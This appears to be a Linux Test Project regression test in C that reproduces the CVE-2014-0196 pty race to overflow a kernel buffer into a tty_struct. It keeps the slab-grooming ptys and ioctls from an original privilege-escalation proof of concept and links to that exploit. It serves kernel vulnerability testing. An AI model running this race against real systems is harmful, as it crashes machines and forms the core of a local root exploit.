1 /*
2  * Copyright (c) 2017 Richard Palethorpe <rpalethorpe@suse.com>
3  * Original POC by Matthew Daley <mattd@bugfuzz.com>
4  *
5  * This program is free software: you can redistribute it and/or modify
6  * it under the terms of the GNU General Public License as published by
7  * the Free Software Foundation, either version 2 of the License, or
8  * (at your option) any later version.
9  *
10  * This program is distributed in the hope that it will be useful,
11  * but WITHOUT ANY WARRANTY; without even the implied warranty of
12  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
13  * GNU General Public License for more details.
14  *
15  * You should have received a copy of the GNU General Public License
16  * along with this program. If not, see <http://www.gnu.org/licenses/>.
17  */
18 /*
19  * This test attempts to cause a buffer overflow using the race condition
20  * described in CVE-2014-0196. If the test is successful in causing an
21  * overflow it will most likely result in an immediate Oops, restart or
22  * freeze. However if it overwrites memory not accessed during the test then
23  * it could happen at a later time or not at all which is more likely if SLAB
24  * randomization has been implemented. However as it currently stands, the test
25  * usually crashes as soon as the delay has been calibrated.
26  *
27  * To maximise the chances of the buffer overflow doing immediate detectable
28  * damage the SLAB filler sockets and ioctls from the original exploit POC
29  * have been kept even though they are not strictly necessary to reproduce the
30  * bug.
31  *
32  * Further details:
33  * see linux commit 4291086b1f081b869c6d79e5b7441633dc3ace00
34  * privilege escalation POC https://www.exploit-db.com/exploits/33516/
35  */
36 
37 #include <pty.h>
38 #include <stdio.h>
39 #include <string.h>
40 #include <termios.h>
41 #include <limits.h>
42 
43 #include "tst_test.h"
44 #include "tst_timer.h"
45 #include "tst_safe_pthread.h"
46 
47 #include "tst_fuzzy_sync.h"
48 
49 #define ONEOFF_ALLOCS 200
50 #define RUN_ALLOCS    30
51 #define BUFLEN        512
52 
53 static volatile int master_fd, slave_fd;
54 static int filler_ptys[ONEOFF_ALLOCS * 2];
55 static int target_ptys[RUN_ALLOCS * 2];
56 static char buf[BUFLEN];
57 
58 static void *overwrite_thread_fn(void *);
59 static struct tst_fzsync_pair fzsync_pair;
60 
create_pty(int * amaster,int * aslave)61 static void create_pty(int *amaster, int *aslave)
62 {
63 	if (openpty(amaster, aslave, NULL, NULL, NULL) == -1)
64 		tst_brk(TBROK | TERRNO, "pty creation failed");
65 }
66 
setup(void)67 static void setup(void)
68 {
69 	int i;
70 
71 	fzsync_pair.exec_loops = 50000;
72 
73 	tst_fzsync_pair_init(&fzsync_pair);
74 
75 	for (i = 0; i < ONEOFF_ALLOCS; i++) {
76 		create_pty(&filler_ptys[i],
77 			   &filler_ptys[i + ONEOFF_ALLOCS]);
78 	}
79 }
80 
overwrite_thread_fn(void * p LTP_ATTRIBUTE_UNUSED)81 static void *overwrite_thread_fn(void *p LTP_ATTRIBUTE_UNUSED)
82 {
83 	while(tst_fzsync_run_b(&fzsync_pair)) {
84 		tst_fzsync_start_race_b(&fzsync_pair);
85 		SAFE_WRITE(0, slave_fd, buf, BUFLEN - 1);
86 		SAFE_WRITE(0, slave_fd, buf, BUFLEN - 1);
87 		SAFE_WRITE(0, slave_fd, buf, BUFLEN);
88 		tst_fzsync_end_race_b(&fzsync_pair);
89 	}
90 	return 0;
91 }
92 
run(void)93 static void run(void)
94 {
95 	struct termios t;
96 	int j;
97 
98 	tst_res(TINFO, "Attempting to overflow into a tty_struct...");
99 
100 	tst_fzsync_pair_reset(&fzsync_pair, overwrite_thread_fn);
101 	while (tst_fzsync_run_a(&fzsync_pair)) {
102 		create_pty((int *)&master_fd, (int *)&slave_fd);
103 
104 		for (j = 0; j < RUN_ALLOCS; j++)
105 			create_pty(&target_ptys[j],
106 				   &target_ptys[j + RUN_ALLOCS]);
107 		SAFE_CLOSE(target_ptys[RUN_ALLOCS / 2]);
108 		SAFE_CLOSE(target_ptys[RUN_ALLOCS / 2 + RUN_ALLOCS]);
109 
110 		SAFE_WRITE(0, slave_fd, buf, 1);
111 
112 		tcgetattr(master_fd, &t);
113 		t.c_oflag &= ~OPOST;
114 		t.c_lflag |= ECHO;
115 		tcsetattr(master_fd, TCSANOW, &t);
116 
117 		tst_fzsync_start_race_a(&fzsync_pair);
118 		SAFE_WRITE(0, master_fd, "A", 1);
119 		tst_fzsync_end_race_a(&fzsync_pair);
120 
121 		for (j = 0; j < RUN_ALLOCS; j++) {
122 			if (j == RUN_ALLOCS / 2)
123 				continue;
124 
125 			ioctl(target_ptys[j], 0xdeadbeef);
126 			ioctl(target_ptys[j + RUN_ALLOCS], 0xdeadbeef);
127 			SAFE_CLOSE(target_ptys[j]);
128 			SAFE_CLOSE(target_ptys[j + RUN_ALLOCS]);
129 		}
130 
131 		ioctl(master_fd, 0xdeadbeef);
132 		ioctl(slave_fd, 0xdeadbeef);
133 		SAFE_CLOSE(master_fd);
134 		SAFE_CLOSE(slave_fd);
135 	}
136 
137 	tst_res(TPASS, "Nothing bad happened, probably.");
138 }
139 
cleanup(void)140 static void cleanup(void)
141 {
142 	int i;
143 
144 	tst_fzsync_pair_cleanup(&fzsync_pair);
145 
146 	for (i = 0; i < ONEOFF_ALLOCS * 2; i++)
147 		close(filler_ptys[i]);
148 	close(master_fd);
149 	close(slave_fd);
150 }
151 
152 static struct tst_test test = {
153 	.setup = setup,
154 	.cleanup = cleanup,
155 	.test_all = run,
156 };
157